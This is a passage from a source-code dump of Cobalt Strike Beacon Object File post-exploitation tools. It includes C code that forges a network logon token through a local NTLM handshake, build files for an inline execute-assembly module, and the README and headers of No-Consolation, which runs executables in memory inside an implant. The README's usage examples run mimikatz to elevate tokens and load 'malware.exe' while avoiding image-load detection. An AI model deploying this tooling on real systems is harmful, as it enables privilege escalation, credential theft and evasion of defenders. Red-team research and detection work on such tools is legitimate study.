    challengeDesc.pBuffers = &challengeBuffer;
    challengeBuffer.cbBuffer = MAX_MESSAGE_SIZE;
    challengeBuffer.BufferType = SECBUFFER_TOKEN;
    challengeBuffer.pvBuffer = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_MESSAGE_SIZE);
    secStatus = SECUR32$AcceptSecurityContext(&hCredServer, NULL, &negotiateDesc, ASC_REQ_DATAGRAM, SECURITY_NATIVE_DREP, &serverContextHandle, &challengeDesc, &serverContextAttributes, &lifetimeServer);
    if (!SEC_SUCCESS(secStatus)) {
        BeaconPrintf(CALLBACK_ERROR, "AcceptSecurityContext Type 2 failed with secstatus code 0x%x \n", secStatus);
        return NULL;
    }

    authenticateDesc.ulVersion = 0;
    authenticateDesc.cBuffers = 1;
    authenticateDesc.pBuffers = &authenticateBuffer;
    authenticateBuffer.cbBuffer = MAX_MESSAGE_SIZE;
    authenticateBuffer.BufferType = SECBUFFER_TOKEN;
    authenticateBuffer.pvBuffer = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_MESSAGE_SIZE);
    secStatus = SECUR32$InitializeSecurityContextA(NULL, &clientContextHandle, NULL, 0, 0, SECURITY_NATIVE_DREP, &challengeDesc, 0, &clientContextHandle, &authenticateDesc, &clientContextAttributes, &lifetimeClient);
    if (!SEC_SUCCESS(secStatus)) {
        BeaconPrintf(CALLBACK_ERROR, "InitializeSecurityContext Type 3 failed with secstatus code 0x%x \n", secStatus);
        return NULL;
    }

    secStatus = SECUR32$AcceptSecurityContext(NULL, &serverContextHandle, &authenticateDesc, 0, SECURITY_NATIVE_DREP, &serverContextHandle, NULL, &serverContextAttributes, &lifetimeServer);
    if (!SEC_SUCCESS(secStatus)) {
        BeaconPrintf(CALLBACK_ERROR, "AcceptSecurityContext failed with secstatus code 0x%x \n", secStatus);
        return NULL;
    }
    SECUR32$QuerySecurityContextToken(&serverContextHandle, &hTokenNetwork);

    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, negotiateBuffer.pvBuffer);
    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, challengeBuffer.pvBuffer);
    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, authenticateBuffer.pvBuffer);
    SECUR32$FreeCredentialsHandle(&hCredClient);
    SECUR32$FreeCredentialsHandle(&hCredServer);
    SECUR32$DeleteSecurityContext(&clientContextHandle);
    SECUR32$DeleteSecurityContext(&serverContextHandle);

    return hTokenNetwork;
}

void CheckTokenSession(HANDLE hToken) {
    DWORD retLenght = 0;
    DWORD tokenSessionId = 0;
    if (!ADVAPI32$GetTokenInformation(hToken, TokenSessionId, &tokenSessionId, sizeof(DWORD), &retLenght)) {
        BeaconPrintf(CALLBACK_ERROR, "GetTokenInformation failed with error code %d \n", KERNEL32$GetLastError());
        return;
    }
    // This should be always true for Windows versions <= 10 Build 1809 
    if (tokenSessionId == 0)
        BeaconPrintf(CALLBACK_OUTPUT,"Forged Token Session ID set to 0. Older Win version detected, lsasrv!LsapApplyLoopbackSessionId probably not present here...\n");
    else
        BeaconPrintf(CALLBACK_OUTPUT,"Forged Token Session ID set to %d. lsasrv!LsapApplyLoopbackSessionId adjusted the token to our current session \n", tokenSessionId);
}

BOOL IsThreadTokenIdentification() {
    HANDLE hTokenImp;
    SECURITY_IMPERSONATION_LEVEL impLevel;
    DWORD retLenght = 0;
    if(!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), MAXIMUM_ALLOWED, TRUE, &hTokenImp)) {
        BeaconPrintf(CALLBACK_ERROR, "OpenThreadToken failed with error code %d \n", KERNEL32$GetLastError());
        return FALSE;
    }
    if (!ADVAPI32$GetTokenInformation(hTokenImp, TokenImpersonationLevel, &impLevel, sizeof(SECURITY_IMPERSONATION_LEVEL), &retLenght)) {
        BeaconPrintf(CALLBACK_ERROR, "GetTokenInformation failed with error code %d \n", KERNEL32$GetLastError());
        return FALSE;
    }
    if (impLevel < SecurityImpersonation)
        return TRUE;
    else
        return FALSE;
    KERNEL32$CloseHandle(hTokenImp);
}

================================================
FILE: Execution-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)
#project(Execution-BOF C)

set(CMAKE_C_STANDARD 99)

# Include directories (main _include is at root level)
include_directories(${CMAKE_SOURCE_DIR}/_include)

# Source files
set(EXECUTE_ASSEMBLY_SOURCES execute-assembly/inlineExecute-Assembly.c)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -w -Wno-incompatible-pointer-types")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")

# Object file targets
add_library(execute-assembly OBJECT ${EXECUTE_ASSEMBLY_SOURCES})

# Subdirectory (commented out - directory doesn't have CMakeLists.txt)
# add_subdirectory(No-Consolation)

# Create _bin directory
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/_bin)

# Custom command to copy object file to _bin
add_custom_target(copy_execute-assembly ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:execute-assembly> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/execute-assembly.x64.o
    DEPENDS execute-assembly
    COMMENT "Copying execute-assembly object file"
)


================================================
FILE: Execution-BOF/Makefile
================================================
all: bof

bof:
	@(mkdir _bin 2>/dev/null) && echo '[+] creating _bin' || echo '[!] _bin exists'
	@(x86_64-w64-mingw32-gcc -w -Wno-incompatible-pointer-types -Os -s -I ../_include -c -o _bin/execute-assembly.x64.o execute-assembly/inlineExecute-Assembly.c && x86_64-w64-mingw32-strip --strip-unneeded _bin/execute-assembly.x64.o) && echo '[+] execute-assembly' || echo '[!] execute-assembly build failed'

	@$(MAKE) --no-print-directory -C No-Consolation
	@cp No-Consolation/_bin/*.o _bin/


clean:
	@(rm -rf _bin)

================================================
FILE: Execution-BOF/No-Consolation/LICENSE
================================================
MIT License

Copyright (c) 2024 Fortra

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


================================================
FILE: Execution-BOF/No-Consolation/Makefile
================================================
BOFNAME := NoConsolation
CC_x64 := x86_64-w64-mingw32-gcc
CC_x86 := i686-w64-mingw32-gcc
STRIP_x64 := x86_64-w64-mingw32-strip
STRIP_x86 := i686-w64-mingw32-strip
OPTIONS := -masm=intel -Wall -I include

release:
	@(mkdir _bin 2>/dev/null) && echo 'creating _bin' || echo '_bin exists'
	@($(CC_x64) -c source/entry.c -o _bin/$(BOFNAME).x64.o $(OPTIONS) && $(STRIP_x64) --strip-unneeded _bin/$(BOFNAME).x64.o) && echo '[+] NoConsolation x64' || echo '[!] NoConsolation x64'
	@($(CC_x86) -c source/entry.c -o _bin/$(BOFNAME).x86.o $(OPTIONS) && $(STRIP_x86) --strip-unneeded _bin/$(BOFNAME).x86.o) && echo '[+] NoConsolation x86' || echo '[!] NoConsolation x86'

clean:
	@(rm -rf _bin)

================================================
FILE: Execution-BOF/No-Consolation/README.md
================================================
# No-Consolation

This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e. spawning `conhost.exe`).  

## Features
- Supports 64 and 32 bits
- Supports EXEs and DLLs
- Does not create new processes
- Does not create new threads
- Links modules to the PEB
- Saves binaries in memory
- Supports C++ exceptions (x64 only)
- Custom loads all dependencies

## Usage
```
Usage:    noconsolation [--local] [--inthread] [--link-to-peb] [--dont-unload] [--timeout 60] [-k] [--method funcname] [-w] [--no-output] [--alloc-console] [--close-handles] [--free-libraries wininet.dll,winhttp.dll] [--dont-save] [--list-pes] [--unload-pe pename] [--load-all-dependencies] [--load-all-dependencies-but advapi32.dll] [--load-dependencies wininet.dll] [--search-paths C:\Windows\Temp\] /path/to/binary.exe arg1 arg2

Arguments:
    [--local]                   : BOOL.     The binary should be loaded from the target Windows machine
    [--inthread]                : BOOL.     Run the PE with the main thread. This might hang your agent depending on the PE and its arguments
    [--link-to-peb]             : BOOL.     Load the PE into the PEB
    [--dont-unload]             : BOOL.     If set, the DLL won't be unloaded
    [--timeout NUM_SECONDS]     : INT.      The number of seconds you wish to wait for the PE to complete running. Default 60 seconds. Set to 0 to disable
    [-k]                        : BOOL.     Overwrite the PE headers
    [--method EXPORT_NAME]      : STRING.   Method or function name to execute in case of DLL. If not provided, DllMain will be executed
    [-w]                        : BOOL.     Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
    [-no]                       : BOOL.     Do not try to obtain the output
    [-ac]                       : BOOL.     Allocate a console. This will spawn a new process
    [-ch]                       : BOOL.     Close Pipe handles once finished. If PowerShell was already ran, this will break the output for PowerShell in the future
    [--free-libraries FL_DLLS]  : STRING.   List of DLLs (DLL_A,DLL_B) (previously loaded with --dont-unload) to be offloaded
    [--dont-save]               : BOOL.     Do not save this binary in memory
    [--list-pes]                : BOOL.     List all PEs that have been loaded in memory
    [--unload-pe PE_NAME]       : STRING.   Unload from memory a PE
    [-lad]                      : BOOL.     Custom load all the PE's dependencies
    [-ladb LADB_DLLS]           : STRING.   Custom load all the PE's dependencies except these (DLL_A,DLL_B)
    [-ld LD_DLLS]               : STRING.   Custom load these PE's dependencies (DLL_A,DLL_B)
    [-sp PATHS ]                : STRING.   Look for DLLs on these paths (PATH_A,PATH_B) (system32 is the default)
    <binary>                    : STRING.   Full path to the windows EXE/DLL you wish you run inside agent. If already loaded, you can simply specify the binary name.
    [args]                      : STRING.   Parameters for the PE. Must be provided after the path

    Example: noconsolation --local C:\windows\system32\windowspowershell\v1.0\powershell.exe $ExecutionContext.SessionState.LanguageMode
    Example: noconsolation /tmp/mimikatz.exe privilege::debug token::elevate exit
    Example: noconsolation --local C:\windows\system32\cmd.exe /c ipconfig
    Example: noconsolation --list-pes
    Example: noconsolation LoadedBinary.exe args
```

## Loading binaries into memory
Binaries are automatically encrypted and stored in memory after they are ran the first time. This means that you do not need to constantly send the binary over the wire.  
To execute a binary that has already been saved in memory, simply specify its name instead of its entire path. So, instead of running:
```
noconsolation --local C:\windows\system32\cmd.exe /c ipconfig
```
You would run:
```
noconsolation cmd.exe /c ipconfig
```

To list all binaries loaded in memory, run `--list-pes`.  
If you are done with some binary and wish to unload it, run `--unload-pe mimikatz.exe`.  
Finally, if you want to run a binary without it being automatically loaded in memory, run it with `--dont-save`.  


## Loading PE's dependencies
You can avoid all image load events by custom loading all the PE's depdendencies:
```
noconsolation -ld --link-to-peb /tmp/malware.exe
```
After execution is completed, the PE and its dependencies will be offloaded automatically.  
DLLs that use Thread Local Storage are not supported.  


## Credits
- [Octoberfest7](https://twitter.com/octoberfest73) for [Inline-Execute-PE](https://github.com/Octoberfest7/Inline-Execute-PE) which was my inspiration for this project
- [modexp](https://twitter.com/modexpblog) and [TheWover](https://twitter.com/TheRealWover) for the PE load logic from [donut](https://github.com/TheWover/donut)
- [rad9800](https://twitter.com/rad9800) for his [HWBP engine](https://github.com/rad9800/hwbp4mw)
- [batsec](https://twitter.com/_batsec_) for [DarkLoadLibrary](https://github.com/bats3c/DarkLoadLibrary)
- [aidankhoury](https://twitter.com/aidankhoury) for [ApiSet](https://github.com/ajkhoury/ApiSet)
- [bb107](https://github.com/bb107) for [MemoryModulePP](https://github.com/bb107/MemoryModulePP)


================================================
FILE: Execution-BOF/No-Consolation/include/apisetlookup.h
================================================
/**
 * API Set Lookup
 * Copyright (c) 2018-2019 Aidan Khoury. All rights reserved.
 *
 * @file apiset.h
 * @author Aidan Khoury (ajkhoury)
 * @date 11/22/2018
 */

#pragma once

//
// API schema definitions.
//

#define API_SET_SCHEMA_VERSION_V2 0x00000002
#define API_SET_SCHEMA_VERSION_V3 0x00000003 // No offline support.
#define API_SET_SCHEMA_VERSION_V4 0x00000004
#define API_SET_SCHEMA_VERSION_V6 0x00000006

PCHAR api_set_resolve(
    IN PCHAR dll_name);


================================================
FILE: Execution-BOF/No-Consolation/include/beacon.h
================================================
/*
 * Beacon Object Files (BOF)
 * -------------------------
 * A Beacon Object File is a light-weight post exploitation tool that runs
 * with Beacon's inline-execute command.
 *
 * Additional BOF resources are available here:
 *   - https://github.com/Cobalt-Strike/bof_template
 *
 * Cobalt Strike 4.x
 * ChangeLog:
 *    1/25/2022: updated for 4.5
 *    7/18/2023: Added BeaconInformation API for 4.9
 *    7/31/2023: Added Key/Value store APIs for 4.9
 *                  BeaconAddValue, BeaconGetValue, and BeaconRemoveValue
 *    8/31/2023: Added Data store APIs for 4.9
 *                  BeaconDataStoreGetItem, BeaconDataStoreProtectItem,
 *                  BeaconDataStoreUnprotectItem, and BeaconDataStoreMaxEntries
 *    9/01/2023: Added BeaconGetCustomUserData API for 4.9
 */

/* data API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} datap;

DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);

/* format API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} formatp;

DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);

/* Output Functions */
#define CALLBACK_OUTPUT      0x0
#define CALLBACK_OUTPUT_OEM  0x1e
#define CALLBACK_OUTPUT_UTF8 0x20
#define CALLBACK_ERROR       0x0d

DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);


/* Token Functions */
DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
DECLSPEC_IMPORT void   BeaconRevertToken();
DECLSPEC_IMPORT BOOL   BeaconIsAdmin();

/* Spawn+Inject Functions */
DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);

/* Utility Functions */
DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

/* Beacon Information */
/*
 *  ptr  - pointer to the base address of the allocated memory.
 *  size - the number of bytes allocated for the ptr.
 */
typedef struct {
	char * ptr;
	size_t size;
} HEAP_RECORD;
#define MASK_SIZE 13

/*
 *  sleep_mask_ptr        - pointer to the sleep mask base address
 *  sleep_mask_text_size  - the sleep mask text section size
 *  sleep_mask_total_size - the sleep mask total memory size
 *
 *  beacon_ptr   - pointer to beacon's base address
 *                 The stage.obfuscate flag affects this value when using CS default loader.
 *                    true:  beacon_ptr = allocated_buffer - 0x1000 (Not a valid address)
 *                    false: beacon_ptr = allocated_buffer (A valid address)
 *                 For a UDRL the beacon_ptr will be set to the 1st argument to DllMain
 *                 when the 2nd argument is set to DLL_PROCESS_ATTACH.
 *  sections     - list of memory sections beacon wants to mask. These are offset values
 *                 from the beacon_ptr and the start value is aligned on 0x1000 boundary.
 *                 A section is denoted by a pair indicating the start and end offset values.
 *                 The list is terminated by the start and end offset values of 0 and 0.
 *  heap_records - list of memory addresses on the heap beacon wants to mask.
 *                 The list is terminated by the HEAP_RECORD.ptr set to NULL.
 *  mask         - the mask that beacon randomly generated to apply
 */
typedef struct {
	char  * sleep_mask_ptr;
	DWORD   sleep_mask_text_size;
	DWORD   sleep_mask_total_size;

	char  * beacon_ptr;
	DWORD * sections;
	HEAP_RECORD * heap_records;
	char    mask[MASK_SIZE];
} BEACON_INFO;

DECLSPEC_IMPORT void   BeaconInformation(BEACON_INFO * info);

/* Key/Value store functions
 *    These functions are used to associate a key to a memory address and save
 *    that information into beacon.  These memory addresses can then be
 *    retrieved in a subsequent execution of a BOF.
 *
 *    key - the key will be converted to a hash which is used to locate the
 *          memory address.
 *
 *    ptr - a memory address to save.
 *
 * Considerations:
 *    - The contents at the memory address is not masked by beacon.
 *    - The contents at the memory address is not released by beacon.
 *
 */
DECLSPEC_IMPORT BOOL BeaconAddValue(const char * key, void * ptr);
DECLSPEC_IMPORT void * BeaconGetValue(const char * key);
DECLSPEC_IMPORT BOOL BeaconRemoveValue(const char * key);

/* Beacon Data Store functions
 *    These functions are used to access items in Beacon's Data Store.
 *    BeaconDataStoreGetItem returns NULL if the index does not exist.
 *
 *    The contents are masked by default, and BOFs must unprotect the entry
 *    before accessing the data buffer. BOFs must also protect the entry
 *    after the data is not used anymore.
 *
 */

#define DATA_STORE_TYPE_EMPTY 0
#define DATA_STORE_TYPE_GENERAL_FILE 1

typedef struct {
	int type;
	DWORD64 hash;
	BOOL masked;
	char* buffer;
	size_t length;
} DATA_STORE_OBJECT, *PDATA_STORE_OBJECT;

DECLSPEC_IMPORT PDATA_STORE_OBJECT BeaconDataStoreGetItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreProtectItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreUnprotectItem(size_t index);
DECLSPEC_IMPORT size_t BeaconDataStoreMaxEntries();

/* Beacon User Data functions */
DECLSPEC_IMPORT char * BeaconGetCustomUserData();

================================================
FILE: Execution-BOF/No-Consolation/include/bofdefs.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>

#define intAlloc(size) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size)
#define intFree(addr) HeapFree(GetProcessHeap(), 0, addr)

#define RTL_UPCASE(wch) (     \
    ((wch) < 'a' ?            \
        (wch)                 \
    :                         \
        ((wch) <= 'z' ?       \
            (wch) - ('a'-'A') \
        :                     \
            ((WCHAR)(wch))    \
        )                     \
    )                         \
)

#define RTL_DOWNCASE(wch) (   \
    ((wch) < 'A' ?            \
        (wch)                 \
    :                         \
        ((wch) <= 'Z' ?       \
            (wch) + ('a'-'A') \
        :                     \
            ((WCHAR)(wch))    \
        )                     \
    )                         \
)

#define LDR_HASH_TABLE_ENTRIES 32

#define GDI_HANDLE_BUFFER_SIZE32 34
#define GDI_HANDLE_BUFFER_SIZE64 60

#ifdef _WIN64
    #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64
#endif

#ifndef _WIN64
    #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32
#endif

typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];

typedef struct _RTL_BALANCED_NODE
{
    union
    {
        struct _RTL_BALANCED_NODE *Children[2];
        struct
        {
            struct _RTL_BALANCED_NODE *Left;
            struct _RTL_BALANCED_NODE *Right;
        };
    };
    union
    {
        UCHAR Red : 1;
        UCHAR Balance : 2;
        ULONG_PTR ParentValue;
    };
} RTL_BALANCED_NODE, *PRTL_BALANCED_NODE;

typedef struct _RTL_RB_TREE {
    PRTL_BALANCED_NODE Root;
    PRTL_BALANCED_NODE Min;
} RTL_RB_TREE, * PRTL_RB_TREE;

typedef struct _API_SET_NAMESPACE
{
    ULONG Version;
    ULONG Size;
    ULONG Flags;
    ULONG Count;
    ULONG EntryOffset;
    ULONG HashOffset;
    ULONG HashFactor;
} API_SET_NAMESPACE, *PAPI_SET_NAMESPACE;

//
// API set schema version 6.
//

typedef struct _API_SET_NAMESPACE_V6 {
    ULONG Version;
    ULONG Size;
    ULONG Flags;
    ULONG Count;
    ULONG EntryOffset;  // API_SET_NAMESPACE_ENTRY_V6
    ULONG HashOffset;   // API_SET_NAMESPACE_HASH_ENTRY_V6
    ULONG HashFactor;
} API_SET_NAMESPACE_V6, *PAPI_SET_NAMESPACE_V6;

typedef struct _API_SET_NAMESPACE_ENTRY_V6 {
    ULONG Flags;
    ULONG NameOffset;
    ULONG NameLength;
    ULONG HashedLength;
    ULONG ValueOffset;
    ULONG ValueCount;
} API_SET_NAMESPACE_ENTRY_V6, *PAPI_SET_NAMESPACE_ENTRY_V6;

typedef struct _API_SET_HASH_ENTRY_V6 {
    ULONG Hash;
    ULONG Index;
} API_SET_HASH_ENTRY_V6, *PAPI_SET_HASH_ENTRY_V6;

typedef struct _API_SET_VALUE_ENTRY_V6 {
    ULONG Flags;
    ULONG NameOffset;
    ULONG NameLength;
    ULONG ValueOffset;
    ULONG ValueLength;
} API_SET_VALUE_ENTRY_V6, *PAPI_SET_VALUE_ENTRY_V6;

typedef const API_SET_VALUE_ENTRY_V6 *PCAPI_SET_VALUE_ENTRY_V6;
typedef const API_SET_HASH_ENTRY_V6 *PCAPI_SET_HASH_ENTRY_V6;
typedef const API_SET_NAMESPACE_ENTRY_V6 *PCAPI_SET_NAMESPACE_ENTRY_V6;
typedef const API_SET_NAMESPACE_V6 *PCAPI_SET_NAMESPACE_V6;


//
// API set schema version 4.
//

typedef struct _API_SET_VALUE_ENTRY_V4 {
    ULONG Flags;        // 0x00
    ULONG NameOffset;   // 0x04
    ULONG NameLength;   // 0x08
    ULONG ValueOffset;  // 0x0C
    ULONG ValueLength;  // 0x10
} API_SET_VALUE_ENTRY_V4, *PAPI_SET_VALUE_ENTRY_V4;

typedef struct _API_SET_VALUE_ARRAY_V4 {
    ULONG Flags;        // 0x00
    ULONG Count;        // 0x04
    API_SET_VALUE_ENTRY_V4 Array[ANYSIZE_ARRAY];
} API_SET_VALUE_ARRAY_V4, *PAPI_SET_VALUE_ARRAY_V4;

typedef struct _API_SET_NAMESPACE_ENTRY_V4 {
    ULONG Flags;
    ULONG NameOffset;
    ULONG NameLength;
    ULONG AliasOffset;
    ULONG AliasLength;
    ULONG DataOffset;   // API_SET_VALUE_ARRAY_V4
} API_SET_NAMESPACE_ENTRY_V4, *PAPI_SET_NAMESPACE_ENTRY_V4;

typedef struct _API_SET_NAMESPACE_ARRAY_V4 {
    ULONG Version;      // 0x00
    ULONG Size;         // 0x04
    ULONG Flags;        // 0x08
    ULONG Count;        // 0x0C
    API_SET_NAMESPACE_ENTRY_V4 Array[ANYSIZE_ARRAY];
} API_SET_NAMESPACE_ARRAY_V4, *PAPI_SET_NAMESPACE_ARRAY_V4;

typedef const API_SET_VALUE_ENTRY_V4 *PCAPI_SET_VALUE_ENTRY_V4;
typedef const API_SET_VALUE_ARRAY_V4 *PCAPI_SET_VALUE_ARRAY_V4;
typedef const API_SET_NAMESPACE_ENTRY_V4 *PCAPI_SET_NAMESPACE_ENTRY_V4;
typedef const API_SET_NAMESPACE_ARRAY_V4 *PCAPI_SET_NAMESPACE_ARRAY_V4;

#define API_SET_SCHEMA_FLAGS_SEALED              0x00000001
#define API_SET_SCHEMA_FLAGS_HOST_EXTENSION      0x00000002

#define API_SET_SCHEMA_ENTRY_FLAGS_SEALED        0x00000001
#define API_SET_SCHEMA_ENTRY_FLAGS_EXTENSION     0x00000002

//
// API set schema version 3.
//

typedef struct _API_SET_VALUE_ENTRY_V3 {
    ULONG NameOffset;
    ULONG NameLength;
    ULONG ValueOffset;
    ULONG ValueLength;
} API_SET_VALUE_ENTRY_V3, *PAPI_SET_VALUE_ENTRY_V3;

typedef struct _API_SET_VALUE_ARRAY_V3 {
    ULONG Count;
    API_SET_VALUE_ENTRY_V3 Array[ANYSIZE_ARRAY];
} API_SET_VALUE_ARRAY_V3, *PAPI_SET_VALUE_ARRAY_V3;

typedef struct _API_SET_NAMESPACE_ENTRY_V3 {
    ULONG NameOffset;
    ULONG NameLength;
    ULONG DataOffset;   // API_SET_VALUE_ARRAY_V3
} API_SET_NAMESPACE_ENTRY_V3, *PAPI_SET_NAMESPACE_ENTRY_V3;

typedef struct _API_SET_NAMESPACE_ARRAY_V3 {
    ULONG Version;
    ULONG Count;
    API_SET_NAMESPACE_ENTRY_V3 Array[ANYSIZE_ARRAY];
} API_SET_NAMESPACE_ARRAY_V3, *PAPI_SET_NAMESPACE_ARRAY_V3;

typedef const API_SET_VALUE_ENTRY_V3 *PCAPI_SET_VALUE_ENTRY_V3;
typedef const API_SET_VALUE_ARRAY_V3 *PCAPI_SET_VALUE_ARRAY_V3;
typedef const API_SET_NAMESPACE_ENTRY_V3 *PCAPI_SET_NAMESPACE_ENTRY_V3;
typedef const API_SET_NAMESPACE_ARRAY_V3 *PCAPI_SET_NAMESPACE_ARRAY_V3;

//
// Support for downlevel API set schema version 2.
//

typedef struct _API_SET_VALUE_ENTRY_V2 {
    ULONG NameOffset;
    ULONG NameLength;
    ULONG ValueOffset;
    ULONG ValueLength;
} API_SET_VALUE_ENTRY_V2, *PAPI_SET_VALUE_ENTRY_V2;

typedef struct _API_SET_VALUE_ARRAY_V2 {
    ULONG Count;
    API_SET_VALUE_ENTRY_V2 Array[ANYSIZE_ARRAY];
} API_SET_VALUE_ARRAY_V2, *PAPI_SET_VALUE_ARRAY_V2;

typedef struct _API_SET_NAMESPACE_ENTRY_V2 {
    ULONG NameOffset;
    ULONG NameLength;
    ULONG DataOffset;   // API_SET_VALUE_ARRAY_V2
} API_SET_NAMESPACE_ENTRY_V2, *PAPI_SET_NAMESPACE_ENTRY_V2;

typedef struct _API_SET_NAMESPACE_ARRAY_V2 {
    ULONG Version;
    ULONG Count;
    API_SET_NAMESPACE_ENTRY_V2 Array[ANYSIZE_ARRAY];
} API_SET_NAMESPACE_ARRAY_V2, *PAPI_SET_NAMESPACE_ARRAY_V2;

typedef const API_SET_VALUE_ENTRY_V2 *PCAPI_SET_VALUE_ENTRY_V2;
typedef const API_SET_VALUE_ARRAY_V2 *PCAPI_SET_VALUE_ARRAY_V2;
typedef const API_SET_NAMESPACE_ENTRY_V2 *PCAPI_SET_NAMESPACE_ENTRY_V2;
typedef const API_SET_NAMESPACE_ARRAY_V2 *PCAPI_SET_NAMESPACE_ARRAY_V2;

typedef struct _PEB_LDR_DATA2
{
    ULONG Length;
    BOOLEAN Initialized;
    PVOID SsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID EntryInProgress;
#if (NTDDI_VERSION >= NTDDI_WIN7)
    UCHAR ShutdownInProgress;
    PVOID ShutdownThreadId;
#endif
} PEB_LDR_DATA2, *PPEB_LDR_DATA2;

typedef enum _LDR_DLL_LOAD_REASON
{
    LoadReasonStaticDependency,
    LoadReasonStaticForwarderDependency,
    LoadReasonDynamicForwarderDependency,
    LoadReasonDelayloadDependency,
    LoadReasonDynamicLoad,
    LoadReasonAsImageLoad,
    LoadReasonAsDataLoad,
    LoadReasonEnclavePrimary, // REDSTONE3
    LoadReasonEnclaveDependency,
    LoadReasonUnknown = -1
} LDR_DLL_LOAD_REASON, *PLDR_DLL_LOAD_REASON;

typedef enum _LDR_DDAG_STATE
{
    LdrModulesMerged = -5,
    LdrModulesInitError = -4,
    LdrModulesSnapError = -3,
    LdrModulesUnloaded = -2,
    LdrModulesUnloading = -1,
    LdrModulesPlaceHolder = 0,
    LdrModulesMapping = 1,
    LdrModulesMapped = 2,
    LdrModulesWaitingForDependencies = 3,
    LdrModulesSnapping = 4,
    LdrModulesSnapped = 5,
    LdrModulesCondensed = 6,
    LdrModulesReadyToInit = 7,
    LdrModulesInitializing = 8,
    LdrModulesReadyToRun = 9
} LDR_DDAG_STATE;

typedef struct _LDRP_CSLIST
{
    PSINGLE_LIST_ENTRY Tail;
} LDRP_CSLIST, *PLDRP_CSLIST;

typedef struct _LDR_SERVICE_TAG_RECORD
{
    struct _LDR_SERVICE_TAG_RECORD *Next;
    ULONG ServiceTag;
} LDR_SERVICE_TAG_RECORD, *PLDR_SERVICE_TAG_RECORD;

typedef struct _LDR_DDAG_NODE
{
    LIST_ENTRY Modules;
    PLDR_SERVICE_TAG_RECORD ServiceTagList;
    ULONG LoadCount;
    ULONG LoadWhileUnloadingCount;
    ULONG LowestLink;
    union
    {
        LDRP_CSLIST Dependencies;
        SINGLE_LIST_ENTRY RemovalLink;
    };
